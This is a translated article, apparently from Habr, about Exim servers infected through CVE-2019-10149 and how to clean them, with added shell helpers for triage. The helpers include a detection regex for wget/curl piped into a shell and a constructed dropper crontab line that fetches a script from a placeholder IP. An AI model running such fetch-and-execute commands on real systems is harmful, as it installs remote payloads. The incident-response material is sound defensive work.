Urgently update Exim to 4.92: there is an active infection underway

Colleagues who run Exim versions 4.87...4.91 on their mail servers: update urgently to version 4.92, stopping Exim itself first, to avoid being compromised through CVE-2019-10149.

Several million servers worldwide are potentially vulnerable; the vulnerability is rated critical (CVSS 3.0 base score = 9.8/10). Attackers can execute arbitrary commands on your server, in many cases as root.

Please make sure you are running the fixed version (4.92) or one that has already been patched.
Or patch the existing one; see the thread under the comment.

Update for CentOS 6: see Theodor's comment. It works for CentOS 7 too, if the update has not arrived directly from EPEL yet.

UPD: Ubuntu 18.04 and 18.10 are affected, and an update has been released for them. Versions 16.04 and 19.04 are not affected unless non-default build options were enabled. More details on their official website.

Information about the problem on Opennet
Information on the Exim website

The problem described there is now being actively exploited (by a bot, presumably); I have noticed infections on some servers (running 4.91).

Further reading is relevant only to those who have already been "hit": you either need to move everything to a clean VPS with fresh software, or look for a solution. Shall we try? Write in if anyone manages to beat this malware.

If you, as an Exim user reading this, still have not updated (have not made sure that 4.92 or a patched version is available), please stop and run to update.

For those who have already been hit, let's continue...

UPD: supersmile2009 found another variety of the malware and gives the right advice:

There can be many kinds of malware. Having run the cure for the wrong one and cleaned the queue, the user will not be cured and may not know what he needs to be cured of.

The infection shows itself like this: [kthrotlds] loads the CPU; on a weak VDS to 100%, on stronger servers less, but noticeably.

After infection, the malware removes the cron entries and registers only itself there to run every 4 minutes, while making the crontab file immutable. crontab -e cannot save changes; it gives an error.

The immutable flag can be removed, for example, like this, and the command line (1.5 KB) then deleted:

chattr -i /var/spool/cron/root
crontab -e

Then, in the crontab editor (vim), delete the line and save:
dd
:wq

However, one of the active processes overwrites it again; I'm figuring out which one.

At the same time, a bunch of active wgets (or curls) are hanging on addresses from the installer script (see below); for now I knock them down like this, but they start up again:

ps aux | grep wge[t]
ps aux | grep cur[l]
echo "Stopping..."
kill -9 $(ps aux | grep wge[t] | awk '{print $2}')
kill -9 $(ps aux | grep cur[l] | awk '{print $2}')
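The three indicators described above (an immutable crontab, a cron entry that pulls a payload with wget/curl every few minutes, and a process named [kthrotlds]) can be checked in one pass. The POSIX shell helper below is an added example and is not code from the original post or from any of the cure scripts mentioned; the cron locations it walks are assumptions about a typical CentOS/Debian layout, and the crontab in its demo is constructed, so nothing on the real system is read when you run the demo.

```shell
#!/bin/sh
# Added triage helper, not code from the original post. It checks the
# indicators described above: cron files made immutable with chattr +i,
# cron entries that fetch a payload with wget/curl or pipe into a shell,
# and a process named [kthrotlds]. The cron paths in triage_cron are
# assumptions; the sample crontab in demo is constructed.

# Print cron lines (with line numbers) that download something or pipe
# into a shell; comment lines are skipped. Usage: suspicious_cron_lines FILE
suspicious_cron_lines() {
    grep -nE '(wget|curl|tftp)[[:space:]]|[|][[:space:]]*(ba)?sh([[:space:]]|$)' "$1" 2>/dev/null \
        | grep -vE '^[0-9]+:[[:space:]]*#'
}

# Return 0 if FILE carries the immutable attribute. lsattr's first column is
# the attribute string, e.g. "----i---------e-------", where "i" is immutable.
is_immutable() {
    command -v lsattr >/dev/null 2>&1 || return 1
    lsattr -d "$1" 2>/dev/null | awk '{ print $1 }' | grep -q 'i'
}

# Count running processes whose name contains NAME (default kthrotlds).
# Bracketing the first character keeps the grep itself out of the hits.
count_procs_named() {
    name=${1:-kthrotlds}
    first=$(printf '%s' "$name" | cut -c1)
    rest=$(printf '%s' "$name" | cut -c2-)
    ps aux 2>/dev/null | grep -c "[$first]$rest"
}

# Walk the usual cron locations and report what looks wrong.
triage_cron() {
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        is_immutable "$f" && echo "IMMUTABLE: $f"
        suspicious_cron_lines "$f" | sed "s|^|SUSPECT $f:|"
    done
    return 0
}

# Offline demo on a constructed crontab (198.51.100.7 is a documentation
# address); prints the one line that matches the dropper pattern.
demo() {
    tmp=$(mktemp)
    cat >"$tmp" <<'EOF'
# constructed sample crontab
0 3 * * * /usr/bin/certbot renew --quiet
*/4 * * * * wget -q -O- http://198.51.100.7/ld.sh | sh
EOF
    suspicious_cron_lines "$tmp"
    rm -f "$tmp"
}

demo
```

Run `triage_cron` as root on a live host to get a list of immutable cron files and suspect lines; `count_procs_named` tells you whether the miner is still alive, which is the cue (as the post later notes) that a reboot is needed rather than another round of editing crontab.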

I found the trojan's installer script here (CentOS): /usr/local/bin/nptd... I'm not posting it, to avoid misuse, but if anyone is infected and understands shell scripts, please study it carefully.

I will add more as information is updated.

UPD 1: Deleting the files (after a preliminary chattr -i) /etc/cron.d/root, /etc/crontab, rm -Rf /var/spool/cron/root did not help, and neither did stopping the service; for now I had to rip out crontab completely (rename the binary).

UPD 2: The trojan's installer sometimes turned up in other places; searching by size helps:
find / -size 19825c

UPD 3: Attention! Besides disabling SELinux, the trojan adds its own SSH key to ${sshdir}/authorized_keys! And it enables the following fields in /etc/ssh/sshd_config, if they were not already set to yes:
PermitRootLogin yes
RSAAuthentication yes
PubkeyAuthentication yes
echo UsePAM yes
PasswordAuthentication yes
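Two things follow from UPD 3: the effective sshd_config settings have to be read the way sshd reads them (first occurrence of a key wins, comments ignored), and authorized_keys has to be compared against a copy you trust rather than eyeballed. The shell helper below is an added example, not code from the original post; it assumes you can supply a known-good authorized_keys as the baseline, does not model Match blocks, and the configs and keys in its demo are constructed (the key material is not real).

```shell
#!/bin/sh
# Added example, not code from the original post. Audits the sshd_config
# keys the trojan is reported to flip and diffs authorized_keys against a
# known-good copy. Sample configs and keys below are constructed.

# Print "key value" (lowercased) for the settings of interest. Like sshd,
# the first occurrence of a key wins; comments and blank lines are ignored.
# Match blocks are not modelled. Usage: sshd_effective_settings FILE
sshd_effective_settings() {
    awk '
        /^[[:space:]]*#/ || NF < 2 { next }
        {
            k = tolower($1)
            if (k ~ /^(permitrootlogin|passwordauthentication|pubkeyauthentication|usepam|rsaauthentication)$/ && !(k in seen)) {
                seen[k] = 1
                print k, tolower($2)
            }
        }' "$1"
}

# Print one FINDING line per setting that widens remote access the way the
# post describes. PubkeyAuthentication yes is normal and is not flagged.
audit_sshd_config() {
    sshd_effective_settings "$1" | awk '
        $1 == "permitrootlogin" && $2 == "yes"        { print "FINDING: PermitRootLogin yes" }
        $1 == "passwordauthentication" && $2 == "yes" { print "FINDING: PasswordAuthentication yes" }'
}

# Print lines of CURRENT that are absent from BASELINE (whole-line compare,
# comments and blank lines ignored). Usage: unknown_authorized_keys BASELINE CURRENT
unknown_authorized_keys() {
    awk -v base="$1" '
        BEGIN { while ((getline l < base) > 0) if (l !~ /^[[:space:]]*(#|$)/) known[l] = 1 }
        /^[[:space:]]*(#|$)/ { next }
        !($0 in known)' "$2"
}

# Offline demo on constructed files: the weakened config as the post shows it,
# a hardened counterpart, and an authorized_keys with one key not in baseline.
demo() {
    d=$(mktemp -d)
    cat >"$d/sshd_config.weak" <<'EOF'
# constructed: what the post says the trojan leaves behind
PermitRootLogin yes
RSAAuthentication yes
PubkeyAuthentication yes
UsePAM yes
PasswordAuthentication yes
EOF
    cat >"$d/sshd_config.hardened" <<'EOF'
# constructed: key-only access, no root login
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
UsePAM yes
EOF
    printf '%s\n' 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedAdminKeyNotARealKey admin@constructed' >"$d/keys.baseline"
    cp "$d/keys.baseline" "$d/keys.current"
    printf '%s\n' '# constructed: line appended by an intruder' \
        'ssh-rsa AAAAB3NzaC1yc2EConstructedUnknownKeyNotARealKey' >>"$d/keys.current"

    echo "== weak config";     audit_sshd_config "$d/sshd_config.weak"
    echo "== hardened config"; audit_sshd_config "$d/sshd_config.hardened"
    echo "== unknown keys";    unknown_authorized_keys "$d/keys.baseline" "$d/keys.current"
    rm -rf "$d"
}

demo
```

On a real host, point `audit_sshd_config` at /etc/ssh/sshd_config and `unknown_authorized_keys` at a baseline from backup or configuration management and at each user's authorized_keys (root's first); anything the diff prints is removed before sshd is restarted, as UPD 4 instructs.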

UPD 4: Summing up so far: disable Exim and cron (with the root entries), urgently remove the trojan's key from ssh and edit the sshd config, and restart sshd! It is not yet clear that this will help, but there is no way around it.

I moved the important information from the comments about patches/updates to the beginning of the article, so that readers start with it.

UPD 5: AnotherDenny writes that the malware changed passwords in WordPress.

UPD 6: Paulmann has prepared a temporary cure, let's test it! After a reboot or a stop the cure seems to disappear, but for now that is what there is.

Whoever makes (or finds) a stable solution, please write; you will help many.

UPD 7: User clsv writes:

If it hasn't been said yet: the virus is resurrected thanks to an unsent letter in Exim; when it tries to send the letter again, it is restored. Look in /var/spool/exim4

You can clear the whole Exim queue like this:
exipick -i | xargs exim -Mrm
To check the number of entries in the queue:
exim -bpc

UPD 8: Thanks again to AnotherDenny for the information: FirstVDS have offered their own version of the cure script, let's test it!

UPD 9: It seems to work, thanks to Kirill for the script!

The main thing is not to forget that the server had already been compromised and the attackers may have had time to plant some other unusual nastiness (not listed in the dropper).

Therefore it is better to move to a freshly installed server (VDS), or at least keep following the topic: if there is anything new, write in the comments here, because obviously not everyone is going to do a fresh install...

UPD 10: Thanks again to clsv, who reminds us that not only servers are infected, but also Raspberry Pis and all sorts of virtual machines... So after saving your servers, don't forget to save your video consoles, robots, etc.

UPD 11: From the author of the cure script, an important note for those curing by hand:
(after applying one or another method of fighting this malware)

You absolutely must reboot: the malware sits somewhere in the open processes and, accordingly, in memory, and writes itself back into cron every 30 seconds.

UPD 12: supersmile2009 found another (?) malware in Exim's queue and advises starting by studying your specific problem before starting the cure.

UPD 13: lorc advises rather moving to a clean system, and transferring files extremely carefully, because the malware is already publicly available and can be used in other, less obvious and more dangerous ways.

UPD 14: for the clever people who don't run as root, one more urgent message from clsv:

Even if it doesn't run as root, the hack still happens... I have Debian Jessie UPD: Stretch on my OrangePi, Exim runs as Debian-exim and the hack still happens, crons get lost, etc.

UPD 15: when moving from a compromised server to a clean one, don't forget about hygiene; a useful reminder from w0den:

When transferring data, pay attention not only to executable or configuration files, but to anything that can contain malicious commands (for example, in MySQL this could be CREATE TRIGGER or CREATE EVENT). Also don't forget about .html, .js, .php, .py and other public files (ideally these files, like other data, should be restored from a local or other trusted store).

UPD 16: daykkin and evil_me ran into a different problem: the system had one version of Exim installed from ports, but a different one was actually running.

So after updating, everyone should make sure they are using the new version!

exim --version

We worked through their specific situation together.

The server used DirectAdmin and its old da_exim package (an old version, without the vulnerability).

At the same time, through DirectAdmin's package manager, a newer version of Exim had in fact been installed, and that one was already vulnerable.

In this situation, updating via custombuild also helped.

Don't forget to make backups before such experiments, and check that before/after the update all Exim processes of the old version have been stopped and are not "stuck" in memory.
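`exim --version` only tells you which binary is on disk; an Exim daemon started before the upgrade keeps running the old, vulnerable code, because the kernel holds the unlinked inode open. On Linux that shows up as /proc/PID/exe resolving to "<path> (deleted)". The helper below is an added example, not code from the original post, and goes slightly beyond the Exim case: it lists every process in that state, then narrows to a program name. It assumes Linux procfs; the daemon name "exim" matches the post's command and is exim4 on Debian.

```shell
#!/bin/sh
# Added example, not code from the original post. Lists processes that are
# still executing a binary that has been replaced or deleted on disk, which
# is the "old Exim still in memory after the update" situation the post
# warns about. Needs Linux procfs: after an unlink the kernel keeps the old
# inode alive and /proc/PID/exe resolves to "<path> (deleted)".

# Print "PID PATH (deleted)" for every process whose executable is gone.
# Processes we may not inspect (other users', kernel threads) are skipped.
stale_binary_processes() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            *' (deleted)') echo "${p#/proc/} $exe" ;;
        esac
    done
    return 0
}

# Same, restricted to executables whose basename is NAME (e.g. exim).
# Paths containing spaces are not handled; daemon paths normally have none.
stale_binary_processes_named() {
    stale_binary_processes | awk -v name="$1" '{ b = $2; sub(/.*\//, "", b); if (b == name) print }'
}

# Exit status helper for scripting: 0 when NAME has no stale copies running.
no_stale_copies_of() {
    [ -z "$(stale_binary_processes_named "$1")" ]
}

# Stand-alone usage: report anything stale, then check the mail daemon.
stale_binary_processes
if no_stale_copies_of exim; then
    echo "no stale exim binaries in memory"
else
    echo "WARNING: old exim processes still running; stop them before trusting 'exim --version'"
fi
```

Run it after the package upgrade and again after the restart; the WARNING branch is the case the post describes, where a reboot or an explicit stop of the old daemon is required before the version reported on disk means anything.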

Source: www.habr.com
